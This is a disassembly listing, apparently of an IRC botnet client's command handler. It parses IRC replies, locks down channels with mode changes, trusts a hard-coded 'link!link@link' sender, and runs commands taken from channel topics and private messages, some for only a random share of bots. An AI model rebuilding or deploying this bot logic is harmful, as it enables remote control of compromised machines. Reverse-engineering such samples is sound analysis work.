loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DB2C
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EED8
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EED8
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41EDD8
push offset dword_41DB3C
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41EFD8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41EFD8
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41EFD8
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EED8
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EED8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EED8
push [ebp+arg_4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EED8
push [ebp+var_90]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EED8
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EED8
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov dword_41EA3C, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and dword_41EA3C, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp off_41DAD0[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push off_41DAD0[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push off_41DAD0[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push off_41DAD0[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push off_41DAD0[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
